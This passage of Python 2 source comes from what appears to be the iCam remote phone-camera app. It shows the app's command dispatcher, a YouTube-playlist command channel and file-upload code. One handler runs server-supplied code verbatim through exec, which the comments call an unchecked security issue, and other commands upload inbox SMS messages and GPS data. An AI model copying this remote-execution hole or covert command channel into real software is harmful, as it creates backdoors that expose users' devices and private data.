                # Multi-line form: consume subsequent lines from the shared
                # iterator until the end-marker line is seen.
                btCmd = cmdLine[len(tokens[0]) + len(tokens[1]) + 2:]
                # print "Initially btCmd =", btCmd
                while cmdIterator.__length_hint__() > 0:
                    cmdLineNew = cmdIterator.next()
                    if cmdLineNew == "send-commands-via-bluetooth-endline":
                        break
                    else:
                        btCmd += "\n" + cmdLineNew
                DebugPrint("ExecuteCommands(): btCmd = %s." % btCmd)
                """
                Note that BluetoothUploadGZippedData() calls also the
                BluetoothClientDiscoverServer(), but since we are
                normally executing this command from the BT server and
                it can send commands to several BT clients, then need to
                reinitialize each time bluetoothServerOPPServicePort -
                we normally don't recompute it otherwise, since we assume
                the phone is BT client.
                """
                BluetoothClientDiscoverServer(tokens[1])
                BluetoothUploadGZippedData(tokens[1], btCmd, \
                    COMMANDS_FILENAME, newMode=NEW_BT_FORMAT)
            elif tokens[0] == "set-logging-level":
                MY_DEBUG_STDOUT = int(tokens[1])
                MY_DEBUG_STDERR = int(tokens[2])
                MY_DEBUG_STDERR_2 = int(tokens[3])
                MY_DEBUG_UPLOAD_MSG = int(tokens[4])
            elif tokens[0] == "set-pause-interval":
                # myTimer.cancel()
                # SetPauseInterval returns a callable; call it immediately.
                SetPauseInterval(int(tokens[1]))()
            elif tokens[0] == "set-pauseIntervalGdata":
                # res = 1
                pauseIntervalGdata = int(tokens[1])
            elif tokens[0] == "set-battery-level-threshold":
                BATTERY_LEVEL_THRESHOLD = int(tokens[1])
            elif tokens[0] == "set-camera-mode":
                """
                Note: 0 = None, 1 = Only Video, 2 = Only Photo,
                3 = Both Photo and Video
                """
                cameraMode[int(tokens[1])] = int(tokens[2])
            elif tokens[0] == "set-photo-resolution-index":
                SetUploadedPhotoResolutionIndex(int(tokens[1]))()
            elif tokens[0] == "set-photo-quality":
                SetPhotoQuality(int(tokens[1]))()
            elif tokens[0] == "set-photo-mode-index":
                pass
            elif tokens[0] == "set-digital-zoom":
                SetDigitalZoom(int(tokens[1]))()
            elif tokens[0] == "set-camera-exposure-index":
                cameraId = int(tokens[1])
                exposureIndex[cameraId] = int(tokens[2])
            elif tokens[0] == "set-camera-whitebalance-index":
                cameraId = int(tokens[1])
                whiteBalanceIndex[cameraId] = int(tokens[2])
            elif tokens[0] == "set-flash-index":
                flashIndex = int(tokens[1])
            elif tokens[0] == "set-camera-video-record-duration":
                cameraId = int(tokens[1])
                SetRecordDuration(cameraId, int(tokens[2]))
            elif tokens[0] == "set-video-mute":
                # Command carries "mute"; stored flag is "audio enabled",
                # hence the 1 - x inversion.
                videoAudioEnabled = 1 - int(tokens[1])
                DebugPrint("ExecuteCommands(): made videoAudioEnabled = %d." % \
                    videoAudioEnabled)
            elif tokens[0] == "set-local-video-mode-index":
                cameraId = int(tokens[1])
                localVideoModeIndex[cameraId] = int(tokens[2])
                """
                localVideoMode[cameraId] = \
                    cameraVideoModes[localVideoModeIndex[cameraId]]
                localVideoMode[cameraId][0] = \
                    cameraVideoModes[cameraId][
                    localVideoModeIndex[cameraId]]["size"]
                localVideoMode[cameraId][1] = cameraVideoModes[cameraId][
                    localVideoModeIndex[cameraId]]["rate"]
                """
                localVideoMode[cameraId] = \
                    ( cameraVideoModes[cameraId][
                    localVideoModeIndex[cameraId]]["size"],
                    cameraVideoModes[cameraId][
                    localVideoModeIndex[cameraId]]["rate"] )
            elif tokens[0] == "set-local-photo-resolution-index":
                # SetLocalPhotoResolution()
                cameraId = int(tokens[1])
                localPhotoResolutionIndex[cameraId] = int(tokens[2])
                SetLocalPhotoResolution()
            elif tokens[0] == "set-audio-record-duration":
                # Record-duration slot 2 is audio (0/1 are the cameras).
                SetRecordDuration(2, int(tokens[1]))
            elif tokens[0] == "set-bluetooth-mode":
                # Note: bluetoothMode is: 0 is None; 1 is BT server; 2 is BT client.
                bluetoothMode = int(tokens[1])
            elif tokens[0] == "set-bluetoothServerAddress":
                # Ex: bluetoothServerAddress is "ff:ff:ff:ab:cd:ef"
                bluetoothServerAddress = tokens[1]
            elif tokens[0] == "upload-file":
                UploadFile(tokens[1], ICAM_SERVER_NAME,
                    WEBPAGE_UL_GZIPPED_FILE)
            elif tokens[0] == "upload-inbox-smses":
                if len(tokens) > 1 and \
                    tokens[1] == "and-clean-undesired-smses":
                    # if tokens[1] == "and-clean-undesired-smses":
                    UploadInboxSMSes(True)
                else:
                    UploadInboxSMSes(False)
            elif tokens[0] == "retrieve-gps-coordinates":
                StartGPS()
            elif tokens[0] == "download-file":
                DownloadFile(tokens[1])
            elif tokens[0] == "play-audio-file":
                soundRecord = audio.Sound.open(unicode(tokens[1]))
                DebugPrint("ExecuteCommands(): play-audio-file - starting to " \
                    "play file %s of size %.2f" % \
                    (tokens[1],
                    float(soundRecord.duration()) / 1000000))
                # PlayAudioFile()
                soundRecord.play()
                # soundRecord.play(times=1, interval=0, callback=validate)
                """
                If the audio file is played several times, interval gives the
                time interval between the subsequent plays in microseconds.
                """
                # play([times=1, interval=0, callback=None])
                """
                This is required because otherwise the file stops playing
                (probably because of SetMenu() at the end of this
                function).
                """
                SleepAndPetWatchdog((soundRecord.duration() + 500000) /
                    1000000)
                """
                Inspired from
                Z:\1PhD\ReVival\111111111Src_examples\PyS60_2_0_0\winscw\c\data\python\test\test_audio.py
                """
                """
                max_volume = self.sound_object.max_volume()
                set_volume = max_volume - 2
                self.sound_object.set_volume(set_volume)
                """
                """
                time_of_playback = self.sound_object.duration()
                # Subtract 3 seconds(expressed in micro seconds) from the total
                # duration of the track and start playback from this position.
                start_position = time_of_playback - 3000000L
                self.sound_object.set_position(start_position)
                """
            elif tokens[0] == "set-server":
                ICAM_SERVER_NAME = tokens[1]
            elif tokens[0] == "get-date-and-time":
                myText = "Date and time is: " \
                    + GetCurrentDateTimeStringWithMilliseconds() + "."
                # if MY_DEBUG_UPLOAD_MSG:
                UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
                    WEBPAGE_UL_GZIPPED_TEXT, None)
            elif tokens[0] == "set-date-and-time":
                """
                IMPORTANT NOTE: We can also get the date and time by looking at
                a (preferably small packet) received at
                UploadGzippedStateAndFile.php (or even with
                UploadGzippedText.php).
                """
                if SYMBIAN_OS:
                    e32.set_home_time(float(tokens[1])) # It expects float.
                elif RASPBIAN_OS:
                    """
                    See https://stackoverflow.com/questions/2193964/set-the-hardware-clock-in-python
                    and https://stackoverflow.com/questions/12081310/python-module-to-change-system-date-and-time
                    """
                    strDate = time.strftime("%m/%d/%Y %H:%M:%S", \
                        time.localtime(float(tokens[1])))
                    os.system('date -s "%s"' % strDate)
                    DebugPrint("ExecuteCommands(): called date -s with " \
                        "param strDate = %s" % strDate)
                    """
                    From http://www.computerhope.com/unix/udate.htm:
                    date -s "11/20/2003 12:48:00"
                    """
                #!!!!TODO: implement for the other platforms, as well
            elif tokens[0] == "adjust-date-and-time-using-delta":
                """
                On S60 3rd+ edition we need WriteDeviceData capabilities (which
                implies we have to sign with dev certificate) -
                See http://discussion.forum.nokia.com/forum/showthread.php?119016-e32.set_home_time%20%20-fails-on-real-device#903719400565939968.
                # Inspired from
                http://discussion.forum.nokia.com/forum/showthread.php?119016-e32.set_home_time%20%20-fails-on-real-device#32583428368845857418
                """
                """
                IMPORTANT: here we should really keep time.time(),
                even for S60 2nd edition phones.
                """
                #myTime = GetTime() + int(tokens[1])
                myTime = time.time() + int(tokens[1])
                # myTime = FromStringToTime(tokens[1])
                # myTime = tokens[1]
                if SYMBIAN_OS:
                    """
                    From http://croozeus.com/Croozeus%20PyS60%20Tutorial8.htm
                    You can also set the phone's time (note that you need
                    WriteDeviceData capability) using:
                    e32.set_home_time(new_time) where new_time is in Unix
                    timestamp format (seconds since 01.01.1970, 00:00:00).
                    For example, e32.set_home_time(1134742324)
                    sets the time to 16.12.2005, 16:12:04
                    """
                    e32.set_home_time(myTime)
            elif tokens[0] == "set-burst-detection":
                burstModeIsStarted = int(tokens[1])
            elif tokens[0] == "set-motion-detection-number-hotspots":
                numHotspots = int(tokens[1])
                if numHotspots > MAX_NUM_HOTSPOTS:
                    # NOTE(review): this bare return exits the whole function
                    # (returning None) and skips SetMenu()/StoreState() below,
                    # leaving numHotspots set above the maximum - confirm
                    # whether clamping/continue was intended.
                    return
            elif tokens[0] == "set-different-pixels-percentage-threshold":
                hotspotIndex = int(tokens[1])
                if hotspotIndex >= MAX_NUM_HOTSPOTS:
                    # NOTE(review): same early-exit concern as above.
                    return
                # NOTE(review): writes index 0 instead of hotspotIndex -
                # looks like a bug; confirm against the server protocol.
                differentPixelsPercentageThreshold[0] = \
                    int(tokens[2])
            elif tokens[0] == "set-motion-detection-hotspot":
                hotspotIndex = int(tokens[1])
                SetMotionDetectionHotspot(hotspotIndex, int(tokens[2]),
                    int(tokens[3]), int(tokens[4]), int(tokens[5]))
            elif tokens[0] == "set-store-locally-media":
                storeLocallyMedia = int(tokens[1])
            elif tokens[0] == "set-upload-media-to":
                uploadMediaToYouTube = int(tokens[1])
                uploadMediaToPicasa = int(tokens[2])
                useiCamServer = int(tokens[3])
                StoreLocalConfigInFile()
            elif tokens[0] == "set-google-username":
                googleUsername = tokens[1]
                StoreLocalConfigInFile()
            elif tokens[0] == "set-google-password-encrypted":
                googlePasswordEncrypted = tokens[1]
                StoreLocalConfigInFile()
            elif tokens[0] == "set-googleKeywords":
                googleKeywords = tokens[1]
                StoreLocalConfigInFile()
            elif tokens[0] == "set-googleMediaPrivate":
                googleMediaPrivate = int(tokens[1])
                StoreLocalConfigInFile()
            elif tokens[0] == "erase-oldest-files-and-messages":
                EraseOldestFilesAndMessages()
            elif tokens[0] == "set-mode-manager":
                modeManagerIsEnabled = int(tokens[1])
            elif tokens[0] == "set-dawn-time":
                # dawnTimeVec is hh:mm:ss
                timeTokens = tokens[1].split(":")
                dawnTimeVec = [int(timeTokens[0]),
                    int(timeTokens[1]), int(timeTokens[2])]
            elif tokens[0] == "set-dusk-time":
                # duskTimeVec is hh:mm:ss
                timeTokens = tokens[1].split(":")
                duskTimeVec = [int(timeTokens[0]),
                    int(timeTokens[1]), int(timeTokens[2])]
            elif tokens[0] == "exec-security-issues":
                """
                "exec-security-issues-no-stdouterr"):
                IMPORTANT TODO: !!!!check for dangerous commands
                See http://stackoverflow.com/questions/701802/how-do-i-execute-a-string-containing-python-code-in-python.
                "eval returns a value, but doesn't work for all commands.
                exec works for all, but doesn't return a value.
                Still trying to figure out a way around this".
                """
                myExecResult = ""
                # exec tokens[1]
                myCmd = cmdLine[len(tokens[0]) + 1:]
                """
                Note that we can put spaces in the commands following the
                exec-... keyword.
                """
                # SECURITY: executes remote-supplied code verbatim (Python 2
                # exec statement); the sanitization TODO above still stands.
                exec myCmd
                myText = "myExecResult = %s" % str(myExecResult)
                # if MY_DEBUG_UPLOAD_MSG:
                UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
                    WEBPAGE_UL_GZIPPED_TEXT, None)
                DebugPrint("ExecuteCommands(): for command %s we got %s" % \
                    (myCmd, myText))
                """
                elif tokens[0] == "get-phone-model-and-number":
                    PHONE_INFO_FILENAME = LOCAL_FOLDER + "/PhoneInfo.txt"
                    fOutput = open(PHONE_INFO_FILENAME, "wb")
                    fOutput.write("blabla")
                    fOutput.close()
                    UploadFile(PHONE_INFO_FILENAME, ICAM_SERVER_NAME,
                        WEBPAGE_UL_GZIPPED_FILE)
                #elif tokens[0] == "set-access-point":
                #elif tokens[0] == "get-phone-number":
                #http://docs.python.org/library/urllib.html
                """
        except:
            # A failing command is logged (and optionally uploaded) but does
            # not abort the batch - the loop continues with the next line.
            (exceptionType, exceptionValue, exceptionTraceback) = \
                sys.exc_info()
            myText = "Exception in ExecuteCommands(). Details: time = %s, " \
                "free_ram = %d. exceptionTraceback = %s, " \
                "exceptionType = %s, exceptionValue = %s." \
                % (GetCurrentDateTimeStringNice(), GetFreeRAM(),
                repr(traceback.format_tb(exceptionTraceback)),
                str(exceptionType), str(exceptionValue))
            if MY_DEBUG_UPLOAD_MSG:
                UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
                    WEBPAGE_UL_GZIPPED_TEXT, None)
            DebugPrint(myText)
            #sys.stderr.write(myText + "\n")
            DebugPrintErrorTrace()
            # return False
    # Refresh UI and persist state after the whole batch has run.
    SetMenu()
    StoreState()
    return True
"""
Where to write the iCam commands in YouTube?
- I googled to see if I can store an arbitrary file on YouTube - I didn't
find anything. Only about storing on Gmail - but this is an unnecessary
complication.
- I use description in
- playlist - a bit more difficult to read, but possible to write with
Gdata
- disadvantage - the playlist can be erased...
- MAYBE in some video
- other possible ideas to implement:
- I can use "user profile" - very simple to read, seems impossible to
write with Gdata
- we can keep track locally on the phone (iCam.py) of the fact that we
downloaded a command
- https://code.google.com/apis/youtube/2.0/developers_guide_protocol.html#Profiles
"The YouTube Data API allows you to retrieve user profiles."
def GetYouTubeUserEntry(self, uri=None, username=None):
Retrieve a YouTubeUserEntry.
- to make certain fields in user profile private go to:
- http://www.youtube.com/profile?user=googleUser#g/f - give edit on
profile and deselect the ones you don't want to make
public ;)
- http://www.youtube.com/account_privacy
- https://sites.google.com/site/googleUser/
It seems there is no GData API for YT Messages
http://www.youtube.com/inbox?folder=messages&action_message=1&authuser=0#inbox/1
Note: I can send myself messages.
- other APIs that can be explored:
Running all tests in module gdata_tests.docs_test
Running all tests in module gdata_tests.health_test
Running all tests in module gdata_tests.spreadsheet_test
Running all tests in module gdata_tests.blogger_test
Running all tests in module gdata_tests.webmastertools_test
- I probably cannot write commands in a file and pretend it's a video
since YouTube will discard the video as invalid.
- more complicated embeddings of commands in a real video are not
very appropriate - for phone I guess it would be harder to
decode them.
"""
def DownloadCommandsFromYouTube():
    """Fetch pending commands stored in a YouTube playlist description.

    Looks for a playlist titled "iCam_cmd_<deviceId>" in the authenticated
    user's feed; its description text is the command payload.  After a real
    command is read, the description is cleared on YouTube so it is not
    executed twice.  Returns the command string, or "" when uploading to
    YouTube is disabled, no command is present, or any error occurs.
    """
    try:
        DebugPrint("Entered DownloadCommandsFromYouTube(): " \
            "uploadMediaToYouTube = %d." % uploadMediaToYouTube)
        if uploadMediaToYouTube == False:
            """
            DebugPrint("DownloadCommandsFromYouTube(): bailing out.")
            """
            return ""
        # Lazily import gdata and connect on first use.
        if youtubeClientAlreadyConnected == False:
            if gdataModulesImported == False:
                ImportGdataModules()
            connResult = ConnectToYouTubeGData()
            """
            If connResult == -1 then don't continue (most likely bad
            username/passwd).!!!!
            """
        playlistTitle = "iCam_cmd_" + deviceId
        playlistDescription = ""
        playlistToUse = None
        """
        We require the YouTube alias/nickname which can be different to the
        Google username!!!!!!!!
        #username='ender123')
        """
        # feed = youtubeClient.GetYouTubePlaylistFeed(username="MultiEnder123")
        feed = youtubeClient.GetYouTubePlaylistFeed()
        # Returns: A YouTubePlaylistFeed if successfully retrieved.
        # print "DownloadCommandsFromYouTube(): feed = %s" % str(feed)
        # print "feed.entry[0] =", feed.entry[0]
        # Scan the feed for the playlist matching our device command title.
        for myEntry in feed.entry:
            myEntryTitle = myEntry.title.text
            # print "myEntryTitle = %s" % myEntryTitle
            # myEntry.id.text = http://gdata.youtube.com/feeds/api/users/MultiEnder123/playlists/3FD3773F7AC5DD1E
            # myEntry.id = <xml>...
            myEntryIdStr = myEntry.id.text.split("/")[-1]
            # print "    myEntryIdStr = %s" % myEntryIdStr
            if myEntryTitle == playlistTitle:
                DebugPrint("DownloadCommandsFromYouTube(): Feed matched " \
                    "myEntry = %s\n" % str(myEntry) + \
                    "DownloadCommandsFromYouTube(): myEntry.content = %s\n" % \
                    str(myEntry.content) + \
                    "DownloadCommandsFromYouTube(): " \
                    "myEntry.description = %s" % str(myEntry.description))
                # playlistDescription = myEntry.description.split("/")[-1]
                # Extract the text between the last ">...</" pair of the
                # description element's XML serialization.
                playlistDescription = \
                    str(myEntry.description).split(">")[-2].split("</")[0]
                DebugPrint("DownloadCommandsFromYouTube(): " \
                    "playlistDescription = %s" % str(playlistDescription))
                playlistToUse = myEntry
                # break
        # An empty description serializes as a self-closing element whose
        # text starts with this namespace pattern - treat it as "no command".
        patternNoCmd = "<ns0:description xmlns:ns0=\"" \
            "http://gdata.youtube.com/schemas/2007\""
        if playlistDescription.find(patternNoCmd) != -1:
            DebugPrint("DownloadCommandsFromYouTube(): This is not a " \
                "command, just an empty description.")
            playlistDescription = ""
        else:
            DebugPrint("DownloadCommandsFromYouTube(): This is a " \
                "real command.")
        if playlistDescription != "":
            """
            Erase the freshly downloaded commands from the YouTube
            playlist (in order to not download and execute it
            again).
            """
            youtubeClient.UpdatePlaylist(playlist_id=myEntryIdStr,
                new_playlist_title=playlistTitle,
                new_playlist_description="",
                playlist_private=True, username="default")
        return playlistDescription
        """
        if playlistToUse is None:
            # Create the playlist if it was not found.
            # Returns: The YouTubePlaylistEntry if successfully posted.
            playlistToUse = youtubeClient.AddPlaylist(playlistTitle,
                playlistTitle, playlist_private=True)
        # It seems this info is not used!
        aVideoTitle = ""
        # It seems this info is not used!
        aVideoDescription = ""
        playlistURI = playlistToUse.feed_link[0].href
        # !!!!!!!!Maybe required
        #time.sleep(10)
        response = youtubeClient.AddPlaylistVideoEntryToPlaylist(playlistURI,
            newVideoEntry.id.text.split('/')[-1],
            aVideoTitle, aVideoDescription)
        """
    except:
        """
        newVideoEntry = youtubeClient.InsertVideoEntry(videoEntry,
            pathFileName)
        """
        (exceptionType, exceptionValue, exceptionTraceback) = sys.exc_info()
        errorStr = "Exception in DownloadCommandsFromYouTube() - details: " \
            "exceptionTraceback = %s, exceptionType = %s, " \
            "exceptionValue = %s. Bailing out..." % \
            (repr(traceback.format_tb(exceptionTraceback)),
            str(exceptionType), str(exceptionValue))
        DebugPrint(errorStr)
        DebugPrintErrorTrace()
        return ""
"""
We use this var to download command from YouTube only once every X (=5)
commands from iCam server.
"""
MAX_NUM_COMMANDS_FILES = 5
def DownloadCommands_real():
    """Fetch and execute pending commands, in priority order.

    Order of sources: (1) local command files cmd.txt[.N] left over from a
    previous run (executed then deleted); (2) the YouTube playlist channel
    (only when downloadCommandsCounter == 0, to rate-limit it); (3) the iCam
    server via HTTP.  Returns the ExecuteCommands() result, False on
    error/no-connection, or None after executing local files.
    NOTE(review): `res` from the local-file loop is computed but never
    returned - confirm whether that was intended.
    """
    global deviceId
    global ICAM_SERVER_NAME
    global accessPointRetryConnect, accessPointName
    global uploadMediaToYouTube
    global downloadCommandsCounter
    DebugPrint("Entered DownloadCommands_real(): accessPointName = %s, " \
        "downloadCommandsCounter = %d." % (accessPointName, \
        downloadCommandsCounter))
    try:
        """
        We allow more than one commands file because, in case we have multiple
        commands to issue, it is possible that iCam will crash (at least the
        S60 version), while executing one of the commands. Therefore,
        we allow files cmd.txt, cmd.txt.1, ..., cmd.txt.5 such that if iCam
        restarts it will continue processing the remaining cmd.txt* files.
        """
        executedLocalCommands = False
        for index in range(MAX_NUM_COMMANDS_FILES):
            pathFileName = LOCAL_FOLDER + "/" + COMMANDS_FILENAME
            if index != 0:
                pathFileName = pathFileName + ".%d" % index
            if os.path.isfile(pathFileName):
                try:
                    fInput = open(pathFileName, "rb") #"rt"????
                    myCommands = fInput.read()
                    fInput.close()
                    # Should I delete pathFileName after
                    # ExecuteCommands(myCommands)? !!!!
                    # Delete before executing so a crash during execution
                    # does not replay the same file forever.
                    os.unlink(pathFileName)
                except:
                    DebugPrintErrorTrace()
                #UpdateDownloadCommandsCounter()
                #return ExecuteCommands(myCommands)
                executedLocalCommands = True
                res = ExecuteCommands(myCommands)
        if executedLocalCommands == True:
            return
        if NoInternetConnection():
            DebugPrint("DownloadCommands(): Not downloading commands since " \
                "there is no Internet connection.")
            #UpdateDownloadCommandsCounter()
            return False
    except:
        DebugPrintErrorTrace()
    try:
        if iOS_PYOBJC:
            DebugPrint("DownloadCommands(): Before urllib.urlopen().")
            # urllib.urlopen() seems to crash the application...
        if uploadMediaToYouTube:
            if downloadCommandsCounter == 0:
                myCommands = DownloadCommandsFromYouTube()
                # GetYouTubeUserProfile()
                #UpdateDownloadCommandsCounter()
                if myCommands != "":
                    return ExecuteCommands(myCommands)
        #UpdateDownloadCommandsCounter()
        #if USE_ICAM_SERVER:
        if useiCamServer > 0:
            DebugPrint("DownloadCommands(): Now trying to download command " \
                "from iCam server.")
            # Server responds with a zlib-compressed command payload.
            myCommandsCompressed = urllib.urlopen("http://" + ICAM_SERVER_NAME +
                WEBPAGE_DL_COMMAND_FILE + "?deviceId=" + deviceId).read()
            myCommands = myCommandsCompressed.decode("zlib")
            if iOS_PYOBJC:
                DebugPrint("DownloadCommands(): After urllib.urlopen().")
            #UpdateDownloadCommandsCounter()
            return ExecuteCommands(myCommands)
    # except IOError: print "DownloadCommands IOError"
    except:
        (exceptionType, exceptionValue, exceptionTraceback) = sys.exc_info()
        myText = "Exception in DownloadCommands. Details: time = %s, " \
            "free_ram = %d. exceptionTraceback = %s, " \
            "exceptionType = %s, exceptionValue = %s." % \
            (GetCurrentDateTimeStringNice(), GetFreeRAM(),
            repr(traceback.format_tb(exceptionTraceback)),
            str(exceptionType), str(exceptionValue))
        if MY_DEBUG_UPLOAD_MSG:
            UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
                WEBPAGE_UL_GZIPPED_TEXT, None)
        #sys.stderr.write(myText + "\n")
        DebugPrint(myText)
        DebugPrintErrorTrace()
        #UpdateDownloadCommandsCounter()
        return False
    #UploadText("Read command file", ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT)
    #return res
# Cycles 0 .. DOWNLOAD_COMMANDS_COUNTER_MAX-1; YouTube is polled only when
# it is 0 (see DownloadCommands_real / UpdateDownloadCommandsCounter).
downloadCommandsCounter = 0
"""
DOWNLOAD_COMMANDS_COUNTER_MAX is the number of iCam server command downloads
before we attempt to download a command from YouTube
(which we want to do less often in the ~idea it's more data intensive).
Has to be > 1 since I use downloadCommandsCounter for sync with the waiting
loop in MainLog().
"""
DOWNLOAD_COMMANDS_COUNTER_MAX = 5
"""
!!!!Although we give hasDownloadedNewCmd = DownloadCommands() and we do not use
hasDownloadedNewCmd anywhere at all,
We should maybe return result from the function, as it was doing the original
DownloadCommands().
"""
def DownloadCommands():
    """Safe wrapper around DownloadCommands_real().

    Runs the real download, swallows (and logs) any exception it raises,
    and always advances downloadCommandsCounter afterwards.  Returns the
    result of DownloadCommands_real(), or False when it raised.
    """
    def UpdateDownloadCommandsCounter():
        # Advance the 0..DOWNLOAD_COMMANDS_COUNTER_MAX-1 cycle used to
        # rate-limit the YouTube command channel.
        global downloadCommandsCounter
        downloadCommandsCounter += 1
        if downloadCommandsCounter == DOWNLOAD_COMMANDS_COUNTER_MAX:
            downloadCommandsCounter = 0
    DebugPrint("Entered DownloadCommands().")
    # BUGFIX: res must be pre-initialized - if DownloadCommands_real()
    # raises, the original code hit `return res` with res unbound
    # (NameError).
    res = False
    try:
        res = DownloadCommands_real()
    except:
        DebugPrintErrorTrace()
    UpdateDownloadCommandsCounter()
    DebugPrint("Exiting DownloadCommands().")
    return res
# thread.start_new_thread(ReactiveLoop_real, ())
# MyThreadStart(DownloadCommands_real)
"""
In order for the viewfinder to correspond to the zoom level, we must take a
picture (without saving it), close and open the viewfinder.
These steps are necessary because of the way the functions are currently
defined in PyS60, and have a slight impact on performance.
Future releases of PyS60 may have optimized functions.
# Take the picture with cameraId = 0.
#pic = camera.take_photo('RGB', cameraPhotoSizes[1], digitalZoom, 'none',
# 'auto', 'auto', 0)
#camera.stop_finder()
#camera.start_finder(ViewFinderCallback, backlight_on = 1, size = (240,180))
"""
def GetTextForState(cameraId):
    """Build a human-readable status string for the device/camera state.

    Concatenates free disk space, RAM, GSM signal, battery/charger, camera
    settings and cell-network identifiers (all read from module globals);
    on Symbian S60 3rd+ edition it appends miso heap/stack statistics.
    cameraId selects which camera's photoModeIndex is reported.  Returns
    whatever was accumulated before any exception (possibly "").
    """
    resText = ""
    try:
        resText = "Free space in bytes on drives: C = %d, D = %d, E = %d. " \
            % (GetFreeDriveSpace("C:"), GetFreeDriveSpace("D:"),
            GetFreeDriveSpace("E:"))
        resText += "free_ram = %d. GSM network signal strength = %d [%s]. " \
            "Battery = %d, charger_status = %d. " \
            "Pause interval (pauseInterval) = %d. " \
            "Camera modes = (%d, %d). " \
            % (
            GetFreeRAM(),
            signalStrength, signalUnits,
            GetBatteryLevelPercentage(), GetChargerStatus(),
            pauseInterval,
            cameraMode[0], cameraMode[1]
            )
        resText += "Resolution (photoResolutionIndex) = %d. " \
            "photoModeIndex = %d. digitalZoom = %d. " \
            "photoQuality = %d. exposureIndex[0] = %d. " \
            % (photoResolutionIndex, photoModeIndex[cameraId],
            digitalZoom, photoQuality, exposureIndex[0])
        resText += "whiteBalanceIndex[0] = %d. exposureIndex[1] = %d. " \
            "whiteBalanceIndex[1] = %d. flashIndex = %d. " \
            "audioRecordDuration = %d. " \
            % (whiteBalanceIndex[0], exposureIndex[1],
            whiteBalanceIndex[1], flashIndex, audioRecordDuration)
        resText += "rotateDegreesImage = %d. mobileCountryCode = %d. " \
            "mobileNetworkCode = %d. locationAreaCode = %d. " \
            "cellId = %d. " % \
            (rotateDegreesImage, mobileCountryCode,
            mobileNetworkCode, locationAreaCode, cellId)
        if SYMBIAN_OS:
            """
            It seems miso's heap and/or stack functions give exception:
            "SymbianError: [Errno -5] KErrNotSupported".
            """
            if (S60_EDITION[0] >= 3) and misoIsImported:
                # if misoIsImported:
                resText += "miso: num_alloc_heap_cells() = %d, " \
                    "num_free_heap_cells() = %d, " \
                    "alloc_heap_cells_size() = %d, " \
                    "heap_total_avail() = %d, " \
                    "heap_biggest_avail() = %d, " \
                    "heap_base_address() = %d, stack_info() = %s.\n" \
                    % (
                    miso.num_alloc_heap_cells(),
                    miso.num_free_heap_cells(),
                    miso.alloc_heap_cells_size(),
                    miso.heap_total_avail(),
                    miso.heap_biggest_avail(),
                    miso.heap_base_address(),
                    str(miso.stack_info())
                    )
    except:
        # Best-effort: log and return whatever was built so far.
        DebugPrint("Exception in GetTextForState(cameraId = %d)..." % cameraId)
        DebugPrintErrorTrace()
    return resText
# Upload file from local filesystem to the server.
def UploadFile(pathFileName, inetServerAddress, pageOnServer):
    """Compress a local file with zlib (streaming) and upload it.

    A fixed-size header (path name packed into 256 bytes, preceded by its
    little-endian int length) plus the packet header is compressed together
    with the file contents read in 64 KiB chunks, then handed to
    UploadBinaryData().  Returns UploadBinaryData()'s result, or None when
    reading/compressing the file failed.
    """
    global deviceId
    DebugPrint("Entered UploadFile().")
    # See http://docs.python.org/library/struct.html
    """
    # (32 bits long??) integers, in little endian format.
    IMPORTANT NOTE: we use "<" to specify ALSO no alignment -
    see http://docs.python.org/library/struct.html
    """
    myFormat = "<256s"
    dataHeader = struct.pack(myFormat, pathFileName)
    sizeDataHeader = len(dataHeader)
    """
    IMPORTANT NOTE: we use "<" to specify little endian and no alignment - see
    http://docs.python.org/library/struct.html .
    """
    dataHeader = struct.pack("<i", sizeDataHeader) + dataHeader
    try:
        """
        Read the binary file from disk in chunks, and compress with Zlib using
        stream aware compress objects - see
        http://docs.python.org/library/zlib.html and
        http://stackoverflow.com/questions/2423866/python-decompressing-gzip-chunk-by-chunk/2424549#2424549
        for details.
        """
        # myData = ""
        myBufferSize = 64 * 1024
        # 1 = lowest compression for zlib.compressobj() .
        zlibCompressObject = zlib.compressobj(1)
        # myBuffer = struct.pack("100s", deviceId) + dataHeader
        myBuffer = AddPacketHeader(dataHeader)
        myData = zlibCompressObject.compress(myBuffer)
        fInput = open(pathFileName, "rb")
        while True:
            myBuffer = fInput.read(myBufferSize)
            if len(myBuffer) == 0:
                break
            myData += zlibCompressObject.compress(myBuffer)
        fInput.close()
        # flush() emits whatever the compressor still buffers.
        myData += zlibCompressObject.flush()
        """
        fInput = open(pathFileName, "rb")
        myData = fInput.read()
        fInput.close()
        """
    except:
        # myData = dataHeader + myData
        (exceptionType, exceptionValue, exceptionTraceback) = sys.exc_info()
        if MY_DEBUG_UPLOAD_MSG:
            UploadGZippedData(deviceId,
                "Exception in UploadFile with pathFileName = %s - details: " \
                "free_ram = %d. %s. Bailing out..." % (pathFileName,
                GetFreeRAM(),
                repr(traceback.format_tb(exceptionTraceback))),
                ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT,
                None)
        DebugPrint("Exception in UploadFile with pathFileName = %s. " \
            "Bailing out..." % pathFileName)
        DebugPrintErrorTrace()
        return
    try:
        """
        This returns the basename of the file - I think os.path.basename() is
        not supported on PyS60.
        """
        fileName = os.path.split(pathFileName)[1]
    except:
        DebugPrintErrorTrace()
        # BUGFIX: the original fell through to the return below with
        # fileName unbound (NameError); fall back to the full path.
        fileName = pathFileName
    return UploadBinaryData(myData, inetServerAddress, pageOnServer,
        fileName)
    #return UploadGZippedData(deviceId, myData, inetServerAddress,
    #    pageOnServer, fileName)
def TestPhoneCall():
    """On Android, attempt a test phone call to ALARM_PHONE_NUMBER via SL4A.

    No-op on other platforms; any failure is logged and swallowed.
    """
    if ANDROID_OS:
        try:
            time.sleep(1.0) # 10.0)
            DebugPrint("Before myDroid.phoneCall()")
            # Does not work on Prestigio.
            # The "tel:" URI form is required; see the note below.
            myDroid.phoneCall("tel:" + ALARM_PHONE_NUMBER)
            """
            Does not work on Prestigio. Gives exception:
            "java.lang.NullPointerException".
            """
            # myDroid.phoneCall(ALARM_PHONE_NUMBER)
            DebugPrint("After myDroid.phoneCall()")
        except:
            DebugPrintErrorTrace()
# Presumably caches the last result of a get-latest-photo helper (defined
# elsewhere in this file); None until first use - TODO confirm.
lastResultGetLatestPhoto = None
"""
!!!!TODO: rename LogToYouTubePlaylist() -> ConnectToYouTubeLogPlaylist()
"""
def LogToYouTubePlaylist():
